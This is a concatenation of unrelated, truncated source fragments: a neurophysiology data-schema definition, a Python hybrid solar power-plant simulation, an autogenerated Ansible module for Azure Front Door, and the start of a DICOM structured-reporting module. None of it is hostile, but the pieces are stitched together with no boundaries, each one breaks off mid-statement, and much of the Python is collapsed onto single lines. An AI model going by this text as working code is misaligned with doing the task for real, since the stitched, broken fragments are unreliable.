stores whether the interval just started "
        "(>0 value) or ended (<0 value). Different interval types can be represented in "
        "the same series by using multiple key values (eg, 1 for feature A, 2 for feature "
        "B, 3 for feature C, etc). The field data stores an 8-bit integer. This is largely "
        "an alias of a standard TimeSeries but one that is identifiable as representing time "
        "intervals in a machine-readable way."),
    "merge": ["<TimeSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["2"],
            "value": ["TimeSeries", "IntervalSeries"], "const": True},
        "help?": {
            "data_type": "text",
            "value": "Stores the start and stop times for events", "const": True}},
    "data": {
        "description": (">0 if interval started, <0 if interval ended."),
        "dimensions": ["num_times"],
        "attributes": {
            "conversion": {
                # "description": "Value is float('nan') (const) since this does not apply.",
                "value": "float('NaN')", "const": True},
            "resolution": {
                # "description": "Value is float('nan') (const) since this does not apply",
                "value": "float('NaN')", "const": True},
            "unit": {
                # "description": "Value is \"n/a\" to indicate that this does not apply",
                "value": "n/a", "const": True}},
        "data_type": "int8"},
},
"<OptogeneticSeries>/": {
    "description": "Optogenetic stimulus. The data[] field is in units of watts.",
    "merge": ["<TimeSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["2"],
            "value": ["TimeSeries", "OptogeneticSeries"], "const": True},
        "help?": {
            "data_type": "text",
            "value": "Optogenetic stimulus", "const": True}},
    "data": {
        "description": "Applied power for optogenetic stimulus.",
        "dimensions": ["num_times"],
        "attributes": {
            "unit": {"data_type": "text", "value": "watt"}},
        "data_type": "float32"},
    "site": {
        "description": "Name of site description in general/optogenetics.",
        "data_type": "text",
        "references": "/general/optogenetics/<site_X>/"}
},
"<RoiResponseSeries>/": {
    "description": ("ROI responses over an imaging plane. Each row in data[] should correspond to "
        "the signal from one ROI."),
    "merge": ["<TimeSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["2"],
            "value": ["TimeSeries", "RoiResponseSeries"], "const": True},
        "help?": {
            "data_type": "text",
            "value": ("ROI responses over an imaging plane. Each row in data[] should "
                "correspond to the signal from one ROI"), "const": True}},
    "data": {
        "description": "Signals from ROIs",
        "dimensions": ["num_times", "num_ROIs"],
        "data_type": "float32"},
    "segmentation_interface/": {
        "description": "HDF5 link to image segmentation module defining ROIs.",
        "link": {"target_type": "ImageSegmentation/", "allow_subclasses": False}},
    "segmentation_interface_path": {
        "description": "Path to segmentation module.",
        "data_type": "text",
        "autogen": {
            "type": "link_path", "target": "segmentation_interface/",
            "trim": False, "qty": "!", "format": "$t"}},
    "roi_names": {
        "description": "List of ROIs represented, one name for each row of data[].",
        "data_type": "text",
        "dimensions": ["num_ROIs"]}
},
"<SpatialSeries>/": {
    "description": ("Direction, e.g., of gaze or travel, or position. The "
        "TimeSeries::data field is a 2D array storing position or direction relative "
        "to some reference frame. Array structure: [num measurements] [num dimensions]. "
        "Each SpatialSeries has a text dataset reference_frame that indicates the "
        "zero-position, or the zero-axes for direction. For example, if representing "
        "gaze direction, \"straight-ahead\" might be a specific pixel on the monitor, "
        "or some other point in space. For position data, the 0,0 point might be the "
        "top-left corner of an enclosure, as viewed from the tracking camera. The unit "
        "of data will indicate how to interpret SpatialSeries values."),
    "merge": ["<TimeSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["2"],
            "value": ["TimeSeries", "SpatialSeries"], "const": True},
        "help?": {
            "data_type": "text",
            "value": ("Stores points in space over time. The data[] array structure "
                "is [num samples][num spatial dimensions]"), "const": True}},
    "reference_frame^": {
        "description": "Description defining what exactly 'straight-ahead' means.",
        "data_type": "text"},
    "data": {
        "description": "2-D array storing position or direction relative to some reference frame.",
        "dimensions": ["num_times", "num_features"],
        "attributes": {
            "unit": {"data_type": "text", "value": "meter"}},
        "data_type": "number"},
},
"<ElectricalSeries>/": {
    "description": ("Stores acquired voltage data from extracellular recordings. "
        "The data field of an ElectricalSeries is an int or float array storing data "
        "in Volts. "
        "TimeSeries::data array structure: :blue:`[num times] [num channels] "
        "(or [num_times] for single electrode).`"),
    "merge": ["<TimeSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["2"], "const": True,
            "value": ["TimeSeries", "ElectricalSeries"]},
        "help?": {
            "data_type": "text",
            "value": "Stores acquired voltage data from extracellular recordings",
            "const": True}},
    "data": {
        "description": "Recorded voltage data.",
        "dimensions": [
            ["num_times"],                    # for single electrode (1-d array)
            ["num_times", "num_channels"]],   # for multiple electrodes (2-d array)
        "data_type": "number",
        "attributes": {
            "unit": {"data_type": "text", "value": "volt"}}},
    "electrode_idx": {
        "description": ("Indices (zero-based) to electrodes in "
            "general/extracellular_ephys/electrode_map."),
        "dimensions": ["num_channels"],
        "data_type": "int32",
        "references": "/general/extracellular_ephys/electrode_map.num_electrodes"},
},
"<SpikeEventSeries>/": {
    "description": ("Stores \"snapshots\" of spike events (i.e., threshold crossings) "
        "in data. This may also be raw data, as reported by ephys hardware. If so, the "
        "TimeSeries::description field should describe how events were detected. All "
        "SpikeEventSeries should reside in a module (under EventWaveform interface) "
        "even if the spikes were reported and stored by hardware. All events span the "
        "same recording channels and store snapshots of equal duration. "
        "TimeSeries::data array structure: :blue:`[num events] [num channels] [num samples] "
        "(or [num events] [num samples] for single electrode)`."),
    "merge": ["<ElectricalSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["3"],
            "value": ["TimeSeries", "ElectricalSeries", "SpikeEventSeries"], "const": True},
        "help?": {
            "data_type": "text",
            "value": "Snapshots of spike events from data.", "const": True}},
    "data": {
        "description": "Spike waveforms.",
        "dimensions": [
            ["num_events", "num_samples"],                     # for single electrode (2-d array)
            ["num_events", "num_channels", "num_samples"]],    # for multiple electrodes (3-d array)
        "data_type": "float32",
        "attributes": {
            "unit": {"data_type": "text", "value": "volt"}}},
},
"<PatchClampSeries>/": {
    "description": ("Stores stimulus or response current or voltage. "
        "Superclass definition for patch-clamp data (this class "
        "should not be instantiated directly)."),
    "merge": ["<TimeSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["2"],
            "value": ["TimeSeries", "PatchClampSeries"], "const": True},
        "help?": {
            "data_type": "text",
            "value": "Superclass definition for patch-clamp data", "const": True}},
    "data": {
        "description": "Recorded voltage or current.",
        "dimensions": ["num_times"],
        "data_type": "number"},
    "electrode_name": {
        "description": "Name of electrode entry in /general/intracellular_ephys.",
        "data_type": "text",
        "references": "/general/intracellular_ephys/<electrode_X>/"},
    "gain^": {
        "description": "Units: Volt/Amp (v-clamp) or Volt/Volt (c-clamp)",
        "data_type": "float"},
},
"<VoltageClampStimulusSeries>/": {
    "description": ("Aliases to standard PatchClampSeries. Its functionality is to better"
        " tag PatchClampSeries for machine (and human) readability of the file."),
    "merge": ["<PatchClampSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["3"],
            "value": ["TimeSeries", "PatchClampSeries", "VoltageClampStimulusSeries"],
            "const": True},
        "help?": {
            "data_type": "text",
            "value": "Stimulus voltage applied during voltage clamp recording",
            "const": True}},
},
"<CurrentClampStimulusSeries>/": {
    "description": ("Aliases to standard PatchClampSeries. Its functionality is to better"
        " tag PatchClampSeries for machine (and human) readability of the file."),
    "merge": ["<PatchClampSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["3"],
            "value": ["TimeSeries", "PatchClampSeries", "CurrentClampStimulusSeries"],
            "const": True},
        "help?": {
            "data_type": "text",
            "value": "Stimulus current applied during current clamp recording",
            "const": True}},
},
"<VoltageClampSeries>/": {
    "description": ("Stores current data recorded from intracellular voltage-clamp"
        " recordings. A corresponding VoltageClampStimulusSeries (stored separately as a"
        " stimulus) is used to store the voltage injected."),
    "merge": ["<PatchClampSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["3"],
            "value": ["TimeSeries", "PatchClampSeries", "VoltageClampSeries"], "const": True},
        "help?": {
            "data_type": "text",
            "value": "Current recorded from cell during voltage-clamp recording",
            "const": True}},
    "capacitance_fast^": {
        "attributes": {"unit": {"data_type": "text", "value": "Farad"}},
        "description": "Unit: Farad",
        "data_type": "float32"},
    "capacitance_slow^": {
        "attributes": {"unit": {"data_type": "text", "value": "Farad"}},
        "description": "Unit: Farad",
        "data_type": "float32"},
    "resistance_comp_bandwidth^": {
        "attributes": {"unit": {"data_type": "text", "value": "Hz"}},
        "description": "Unit: Hz",
        "data_type": "float32"},
    "resistance_comp_correction^": {
        "attributes": {"unit": {"data_type": "text", "value": "percent"}},
        "description": "Unit: %",
        "data_type": "float32"},
    "resistance_comp_prediction^": {
        "attributes": {"unit": {"data_type": "text", "value": "percent"}},
        "description": "Unit: %",
        "data_type": "float32"},
    "whole_cell_capacitance_comp^": {
        "attributes": {"unit": {"data_type": "text", "value": "Farad"}},
        "description": "Unit: Farad",
        "data_type": "float32"},
    "whole_cell_series_resistance_comp^": {
        "attributes": {"unit": {"data_type": "text", "value": "Ohm"}},
        "description": "Unit: Ohm",
        "data_type": "float32"}
},
"<CurrentClampSeries>/": {
    "description": ("Stores voltage data recorded from intracellular current-clamp recordings."
        " A corresponding CurrentClampStimulusSeries (stored separately as a stimulus) is used"
        " to store the current injected."),
    "merge": ["<PatchClampSeries>/"],
    "attributes": {
        "ancestry": {
            "data_type": "text", "dimensions": ["3"],
            "value": ["TimeSeries", "PatchClampSeries", "CurrentClampSeries"], "const": True},
        "help?": {
            "data_type": "text",
            "value": "Voltage recorded from cell during current-clamp recording",
            "const": True}},
    "bias_current^": {
        "description": "Unit: Amp",
        "data_type": "float32"},
    "bridge_balance^": {
        "description": "Unit: Ohm",
        "data_type": "float32"},
    "capacitance_compensation^": {
        "description": "Unit: Farad",
        "data_type": "float32"},
    # "resistance_compensation": {
    #     "description": "Resistance compensation",
    #     "data_type": "float",
    #     "unit": "Ohms"},
},
"<IZeroClampSeries>/": {
    "description":
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# """ BLIS - Balancing Load of Intermittent Solar: A characteristic-based transient power plant model Copyright (C) 2020. University of Virginia Licensing & Ventures Group (UVA LVG). All Rights Reserved. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# # Hardcoded Inputs: debug = False # If True, additional information is presented to the console plotDPI = 300 omitPeriod = 0 # Number of samples to ignore (5 hours to give sufficient start-up time) threshold = 0.001 # threshold for rounding (MW) # General Imports: import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns # BLIS Imports: from blis import defaultInputs, PowerPlant, Solar, Fuel, Battery, Grid # ======================================================================== # Class to simulate and analyze Hybrid Renewable Energy System (HRES) # ======================================================================== # Time Series Data attributes_time_series = ['PowerRequest', 'PowerOutput', 'PowerRamp', 'HeatInput', 'Efficiency', 'battCharge', 'battIncrease', 'battDecrease', 'battDischargeRate', 'battChargeRate', 'battRamp', 'solarUsed', 'loadShed', 'deficit', 'gridUsed', 'CO2_produced', 'CO2_captured', 'Emissions'] # Results attributes_results = ['demand_MWh', 'solar_MWh', 'powerOutput_MWh', 'heatInput_MWh', 'solarUsed_MWh', 'loadShed_MWh', 'gridUsed_MWh', 'fuelCost_dollars', 'LCOE', 'efficiency_pct', 'emissions_tons', 'deficit_max', 'deficit_min', 'deficit_pct_time', 'deficit_pct_energy', 'solarCurtail_pct', 'loadShed_pct_energy', 'loadShed_pct_time'] # Add time of day attributes tod_vars = ['emissions', 'costs', 'demand'] tod_hrs = range(24) attributes_tod = [] for var in tod_vars: for hr in tod_hrs: if hr < 10: attributes_tod.append(var + '_hr0' + str(hr)) else: attributes_tod.append(var + '_hr' + str(hr)) attributes_results = attributes_results + attributes_tod # ======================================================================== # Class to simulate and analyze Hybrid Renewable Energy System (HRES) # ======================================================================== class HRES: # ======================================================================== # Initialize HRES Simulation # ======================================================================== def __init__(self, data, plant, solar=Solar(), batt=Battery(), fuel=Fuel(), grid=Grid(), i=0.02, n=20): # Store Inputs 
self.data = data self.solar = solar self.batt = batt self.fuel = fuel self.plant = plant self.grid = grid self.i = i # (fraction) Interst rate self.n = n # (years) System lifetime # Record number of datapoints self.steps = len(data) # Create pandas dataframe to hold time series performance rows = range(self.steps) self.perf = pd.DataFrame(data=0.0, index=rows, columns=attributes_time_series) # ---- # Create pandas series to store results # ---- self.results = pd.Series(index=attributes_results) # ======================================================================== # Update - empty control, needs to be updated by all children of HRES # ======================================================================== def update(self, dt, hour, demand, solar): # ---------- # Calculate Battery Dis/charge Rate Available # ---------- batt_c_rate = self.batt.getChargeRateAvail(dt) batt_d_rate = self.batt.getDischargeRateAvail(dt) if self.plant.capacity > 0.0: # ---------- # Power Plant Control # ---------- # Get Minimum Power Plant Request and # minimum generation possible for current timestep minPowerRequest = self.plant.minPowerRequest minGen = minPowerRequest + solar # If minimum generation will meet or exceed demand, request minimum power plant output # Otherwise, use solar and battery, then request additional production if minGen > demand or abs(minGen - demand) < threshold: powerRequest = minPowerRequest else: powerRequest = demand - solar - batt_d_rate # Keep Power Request at or below max plant capacity if powerRequest > self.plant.capacity: powerRequest = self.plant.capacity # Keep Power Request at or above min plant capacity if powerRequest < minPowerRequest: powerRequest = minPowerRequest # Keep power request at or above threshold if powerRequest < threshold: powerRequest = threshold # Update Power Plant Status self.plant.update(powerRequest, dt) # ---------- # Perform Energy Balance # ---------- supply = self.plant.powerOutput + solar diff = supply - demand battIncrease = 0.0 battDecrease = 0.0 solarUsed = 0.0 loadShed = 0.0 gridUsed = 0.0 # 1) Demand = Supply (within threshold) if (abs(diff) < threshold): solarUsed = solar # 2) Supply > Demand elif (diff > 0.0): # A) Charge Batteries if diff > batt_c_rate: battIncrease = batt_c_rate else: battIncrease = diff diff = diff - battIncrease # Update diff # B) Curtail Solar if diff < solar: solarUsed = solar - diff else: solarUsed = 0.0 diff = diff - (solar - solarUsed) # Update diff # C) Shed Load loadShed = diff # 3) Demand > Supply else: # No excess suppply, so solar is fully used and no load is shed solarUsed = solar # Discharge Batteries if abs(diff) > batt_d_rate: battDecrease = batt_d_rate else: battDecrease = abs(diff) # Update diff = diff + battDecrease # Use grid to make-up remaining difference if abs(diff) < self.grid.capacity: gridUsed = abs(diff) else: gridUsed = self.grid.capacity # ---------- # Calculate Emissions # ---------- CO2_produced = (gridUsed * dt * self.grid.getEmissions(hour)) + ( self.plant.heatInput / 60.0 * dt * self.fuel.emissions) CO2_captured = CO2_produced * (self.plant.co2CaptureEff / 100.0) Emissions = CO2_produced - CO2_captured # ---------- # Update Battery # ---------- self.batt.update(dt, battIncrease, battDecrease) # ---------- # Check Energy Balance # ---------- E_in = solar + self.plant.powerOutput + battDecrease + gridUsed E_out = demand + battIncrease + loadShed + (solar - solarUsed) E_balance = E_in - E_out # Remainder of energy balance stored as deficit deficit = E_balance # ======= # Write to console 
if debugging # ======= if debug: print("#-----------#") print("Batt Charge [MWh]: " + str(self.batt.charge)) print("---") print("solar " + str(solar)) print("powerOutput " + str(self.plant.powerOutput)) print("battDecrease " + str(self.batt.decrease)) print("Energy In [MW]:" + str(E_in)) print("---") print("demand " + str(demand)) print("battIncrease " + str(self.batt.increase)) print("loadShed " + str(loadShed)) print("solarShed " + str(solar - solarUsed)) print("Energy Out [MW]:" + str(E_out)) print("---") print("Balance [MW]:" + str(E_balance)) print("#-----------#") # ======= # Store performance of current timestep in a pandas series # ======= perf = pd.Series(index=attributes_time_series) # Power plant perf.PowerRequest = self.plant.powerRequest perf.PowerOutput = self.plant.powerOutput perf.PowerRamp = self.plant.powerRamp perf.HeatInput = self.plant.heatInput perf.Efficiency = self.plant.efficiency # Battery perf.battCharge = self.batt.charge perf.battIncrease = self.batt.increase perf.battDecrease = self.batt.decrease perf.battDischargeRate = self.batt.dischargeRate perf.battChargeRate = self.batt.chargeRate perf.battRamp = self.batt.ramp # Other perf.solarUsed = solarUsed perf.loadShed = loadShed perf.deficit = deficit perf.gridUsed = gridUsed perf.CO2_produced = CO2_produced perf.CO2_captured = CO2_captured perf.Emissions = Emissions return perf # ======================================================================== # Run Simulation # ======================================================================== def run(self): # Simulate operation for step in range(self.steps): # Access current demand and time step dt = self.data.loc[step, 'dt'] hour = self.data.loc[step, 'hour'] demand = self.data.loc[step, 'demand'] solar = self.data.loc[step, 'solar'] # Print Status (if debugging) if debug: print("\n\nStep: " + str(step)) print("dt (min) : " + str(dt)) print("hour : " + str(hour)) print("Demand (MW) : " + str(demand)) print("Solar (MW) : " + str(solar)) # Update System Operation self.perf.loc[step, :] = self.update(dt, hour, demand, solar) # Store Current Performance # Analyze Results results = self.analyzeResults() return results # ======================================================================== # Analyze Results # ======================================================================== def analyzeResults(self): data = self.data perf = self.perf # Check that enough data points exist for omitPeriod, if not use all data points if len(data) > omitPeriod: data = data.loc[omitPeriod:] perf = perf.loc[omitPeriod:] # Calculate Energy Use from Power ( MW to MWh) # Inputs df_demand = data.loc[:]["demand"] * data[:]["dt"] / 60 df_solar = data.loc[:]["solar"] * data[:]["dt"] / 60 df_powerOutput = perf.loc[:]["PowerOutput"] * data[:]["dt"] / 60 df_heatInput = perf.loc[:]["HeatInput"] * data[:]["dt"] / 60 df_solarUsed = perf.loc[:]["solarUsed"] * data[:]["dt"] / 60 df_loadShed = perf.loc[:]["loadShed"] * data[:]["dt"] / 60 df_deficit = perf.loc[:]["deficit"] * data[:]["dt"] / 60 df_gridUsed = perf.loc[:]["gridUsed"] * data[:]["dt"] / 60 # Sum for the year demand_MWh = df_demand.sum() solar_MWh = df_solar.sum() powerOutput_MWh = df_powerOutput.sum() heatInput_MWh = df_heatInput.sum() solarUsed_MWh = df_solarUsed.sum() loadShed_MWh = df_loadShed.sum() deficit_MWh = df_deficit.sum() gridUsed_MWh = df_gridUsed.sum() # Fuel Cost fuelCost_dollars = heatInput_MWh * self.fuel.cost # $ # Effective Efficiency if heatInput_MWh > 0.0: efficiency_pct
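# ========================================================================
# Usage sketch (illustrative only)
# ========================================================================
# The HRES class above expects a DataFrame with 'dt' (minutes), 'hour', 'demand' (MW) and
# 'solar' (MW) columns, plus component objects imported from blis. The PowerPlant() call
# below is hypothetical -- its real constructor arguments are not shown in this excerpt --
# and the class as excerpted is truncated, so treat this as a sketch rather than a demo.
if __name__ == "__main__":
    demo_data = pd.DataFrame({
        "dt": [60.0] * 24,                                   # one-hour timesteps
        "hour": list(range(24)),
        "demand": [50.0] * 24,                               # MW
        "solar": [0.0] * 6 + [20.0] * 12 + [0.0] * 6,        # MW
    })
    hres = HRES(demo_data, plant=PowerPlant(), solar=Solar(), batt=Battery(),
                fuel=Fuel(), grid=Grid(), i=0.02, n=20)
    results = hres.run()
    print(results)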
<filename>generated/intermediate/ansible-module-rest/azure_rm_frontdoor.py #!/usr/bin/python # # Copyright (c) 2019 <NAME>, (@zikalino) # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: azure_rm_frontdoor version_added: '2.9' short_description: Manage Azure FrontDoor instance. description: - 'Create, update and delete instance of Azure FrontDoor.' options: resource_group: description: - Name of the Resource group within the Azure subscription. required: true type: str name: description: - Resource name. type: str location: description: - Resource location. type: str friendly_name: description: - A friendly name for the frontDoor type: str routing_rules: description: - Routing rules associated with this Front Door. type: list suboptions: id: description: - Resource ID. type: str frontend_endpoints: description: - Frontend endpoints associated with this rule type: list suboptions: id: description: - Resource ID. type: str accepted_protocols: description: - Protocol schemes to match for this rule type: list patterns_to_match: description: - The route patterns of the rule. type: list enabled_state: description: - >- Whether to enable use of this rule. Permitted values are 'Enabled' or 'Disabled' type: str route_configuration: description: - A reference to the routing configuration. type: dict resource_state: description: - Resource status. type: str name: description: - Resource name. type: str type: description: - Resource type. type: str load_balancing_settings: description: - Load balancing settings associated with this Front Door instance. type: list suboptions: id: description: - Resource ID. type: str sample_size: description: - The number of samples to consider for load balancing decisions type: number successful_samples_required: description: - The number of samples within the sample period that must succeed type: number additional_latency_milliseconds: description: - >- The additional latency in milliseconds for probes to fall into the lowest latency bucket type: number resource_state: description: - Resource status. type: str name: description: - Resource name. type: str type: description: - Resource type. type: str health_probe_settings: description: - Health probe settings associated with this Front Door instance. type: list suboptions: id: description: - Resource ID. type: str path: description: - The path to use for the health probe. Default is / type: str protocol: description: - Protocol scheme to use for this probe type: str interval_in_seconds: description: - The number of seconds between health probes. type: number resource_state: description: - Resource status. type: str name: description: - Resource name. type: str type: description: - Resource type. type: str backend_pools: description: - Backend pools available to routing rules. type: list suboptions: id: description: - Resource ID. type: str backends: description: - The set of backends for this pool type: list suboptions: address: description: - Location of the backend (IP address or FQDN) type: str http_port: description: - The HTTP TCP port number. Must be between 1 and 65535. type: number https_port: description: - The HTTPS TCP port number. Must be between 1 and 65535. type: number enabled_state: description: - >- Whether to enable use of this backend. 
Permitted values are 'Enabled' or 'Disabled' type: str priority: description: - >- Priority to use for load balancing. Higher priorities will not be used for load balancing if any lower priority backend is healthy. type: number weight: description: - Weight of this endpoint for load balancing purposes. type: number backend_host_header: description: - >- The value to use as the host header sent to the backend. If blank or unspecified, this defaults to the incoming host. type: str load_balancing_settings: description: - Load balancing settings for a backend pool type: dict suboptions: id: description: - Resource ID. type: str health_probe_settings: description: - L7 health probe settings for a backend pool type: dict suboptions: id: description: - Resource ID. type: str resource_state: description: - Resource status. type: str name: description: - Resource name. type: str type: description: - Resource type. type: str frontend_endpoints: description: - Frontend endpoints available to routing rules. type: list suboptions: id: description: - Resource ID. type: str host_name: description: - The host name of the frontendEndpoint. Must be a domain name. type: str session_affinity_enabled_state: description: - >- Whether to allow session affinity on this host. Valid options are 'Enabled' or 'Disabled' type: str session_affinity_ttl_seconds: description: - >- UNUSED. This field will be ignored. The TTL to use in seconds for session affinity, if applicable. type: number web_application_firewall_policy_link: description: - >- Defines the Web Application Firewall policy for each host (if applicable) type: dict suboptions: id: description: - Resource ID. type: str resource_state: description: - Resource status. type: str custom_https_provisioning_state: description: - Provisioning status of Custom Https of the frontendEndpoint. type: str custom_https_provisioning_substate: description: - >- Provisioning substate shows the progress of custom HTTPS enabling/disabling process step by step. type: str custom_https_configuration: description: - The configuration specifying how to enable HTTPS type: dict suboptions: certificate_source: description: - Defines the source of the SSL certificate type: str protocol_type: description: - >- Defines the TLS extension protocol that is used for secure delivery type: str key_vault_certificate_source_parameters: description: - >- KeyVault certificate source parameters (if certificateSource=AzureKeyVault) type: dict front_door_certificate_source_parameters: description: - >- Parameters required for enabling SSL with Front Door-managed certificates (if certificateSource=FrontDoor) type: dict name: description: - Resource name. type: str type: description: - Resource type. type: str backend_pools_settings: description: - Settings for all backendPools type: dict suboptions: enforce_certificate_name_check: description: - >- Whether to enforce certificate name check on HTTPS requests to all backend pools. No effect on non-HTTPS requests. type: str enabled_state: description: - >- Operational status of the Front Door load balancer. Permitted values are 'Enabled' or 'Disabled' type: str resource_state: description: - Resource status of the Front Door. type: str provisioning_state: description: - Provisioning state of the Front Door. type: str cname: description: - The host that each frontendEndpoint must CNAME to. type: str id: description: - Resource ID. type: str type: description: - Resource type. type: str state: description: - Assert the state of the FrontDoor. 
- >- Use C(present) to create or update an FrontDoor and C(absent) to delete it. default: present choices: - absent - present extends_documentation_fragment: - azure - azure_tags author: - <NAME> (@zikalino) ''' EXAMPLES = ''' - name: Create or update specific Front Door azure_rm_frontdoor: resource_group: myResourceGroup name: myFrontDoor front_door_parameters: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }} location: westus tags: tag1: value1 tag2: value2 properties: routingRules: - name: routingRule1 properties: frontendEndpoints: - id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/frontendEndpoints/{{ frontend_endpoint_name }} - id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/frontendEndpoints/{{ frontend_endpoint_name }} acceptedProtocols: - Http patternsToMatch: - /* routeConfiguration: '@odata.type': >- #Microsoft.Azure.FrontDoor.Models.FrontdoorForwardingConfiguration backendPool: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/backendPools/{{ backend_pool_name }} enabledState: Enabled healthProbeSettings: - name: healthProbeSettings1 properties: path: / protocol: Http intervalInSeconds: '120' loadBalancingSettings: - name: loadBalancingSettings1 properties: sampleSize: '4' successfulSamplesRequired: '2' backendPools: - name: backendPool1 properties: backends: - address: w3.contoso.com httpPort: '80' httpsPort: '443' weight: '1' priority: '2' - address: contoso.com.website-us-west-2.othercloud.net httpPort: '80' httpsPort: '443' weight: '2' priority: '1' - address: contoso1.azurewebsites.net httpPort: '80' httpsPort: '443' weight: '1' priority: '1' loadBalancingSettings: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/loadBalancingSettings/{{ load_balancing_setting_name }} healthProbeSettings: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/healthProbeSettings/{{ health_probe_setting_name }} frontendEndpoints: - name: frontendEndpoint1 properties: hostName: www.contoso.com sessionAffinityEnabledState: Enabled sessionAffinityTtlSeconds: '60' webApplicationFirewallPolicyLink: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoorWebApplicationFirewallPolicies/{{ front_door_web_application_firewall_policy_name }} - name: default properties: hostName: frontDoor1.azurefd.net backendPoolsSettings: enforceCertificateNameCheck: Enabled enabledState: Enabled - name: Delete Front Door azure_rm_frontdoor: resource_group: myResourceGroup name: myFrontDoor state: absent ''' RETURN = ''' id: description: - Resource ID. returned: always type: str sample: null name: description: - Resource name. returned: always type: str sample: null type: description: - Resource type. returned: always type: str sample: null location: description: - Resource location. returned: always type: str sample: null tags: description: - Resource tags. 
returned: always type: >- unknown[DictionaryType {"$id":"539","$type":"DictionaryType","valueType":{"$id":"540","$type":"PrimaryType","knownPrimaryType":"string","name":{"$id":"541","fixed":false,"raw":"String"},"deprecated":false},"supportsAdditionalProperties":false,"name":{"$id":"542","fixed":false},"deprecated":false}] sample: null properties: description: - Properties of the Front Door Load Balancer returned: always type: dict sample: null contains: friendly_name: description: - A friendly name for the frontDoor returned: always type: str sample: null routing_rules: description: - Routing rules associated with this Front Door. returned:
<gh_stars>0 """DICOM structured reporting content item value types.""" import datetime from typing import Any, List, Optional, Sequence, Union import numpy as np from pydicom.dataset import Dataset from pydicom.sequence import Sequence as DataElementSequence from pydicom.sr.coding import Code from pydicom.uid import UID from pydicom.valuerep import DA, TM, DT, PersonName from highdicom.sr.coding import CodedConcept from highdicom.sr.enum import ( GraphicTypeValues, GraphicTypeValues3D, PixelOriginInterpretationValues, RelationshipTypeValues, TemporalRangeTypeValues, ValueTypeValues, ) class ContentItem(Dataset): """Abstract base class for a collection of attributes contained in the DICOM SR Document Content Module.""" def __init__( self, value_type: Union[str, ValueTypeValues], name: Union[Code, CodedConcept], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- value_type: Union[str, highdicom.sr.enum.ValueTypeValues] type of value encoded in a content item name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] coded name or an enumerated item representing a coded name relationship_type: Union[str, highdicom.sr.enum.RelationshipTypeValues], optional type of relationship with parent content item """ # noqa super(ContentItem, self).__init__() value_type = ValueTypeValues(value_type) self.ValueType = value_type.value if not isinstance(name, (CodedConcept, Code, )): raise TypeError( 'Argument "name" must have type CodedConcept or Code.' ) if isinstance(name, Code): name = CodedConcept(*name) self.ConceptNameCodeSequence = [name] if relationship_type is not None: relationship_type = RelationshipTypeValues(relationship_type) self.RelationshipType = relationship_type.value def __setattr__(self, name: str, value: Any) -> None: if name == 'ContentSequence': super(ContentItem, self).__setattr__(name, ContentSequence(value)) else: super(ContentItem, self).__setattr__(name, value) @property def name(self) -> CodedConcept: """CodedConcept: coded name of the content item""" return self.ConceptNameCodeSequence[0] @property def value_type(self) -> str: """str: type of the content item (see `highdicom.sr.value_types.ValueTypeValues`) """ return self.ValueType @property def relationship_type(self) -> str: """str: type of relationship the content item has with its parent (see `highdicom.sr.enum.RelationshipTypeValues`) """ return getattr(self, 'RelationshipType', None) class ContentSequence(DataElementSequence): """Sequence of DICOM SR Content Items.""" def __init__(self, items: Optional[Sequence] = None) -> None: if items is not 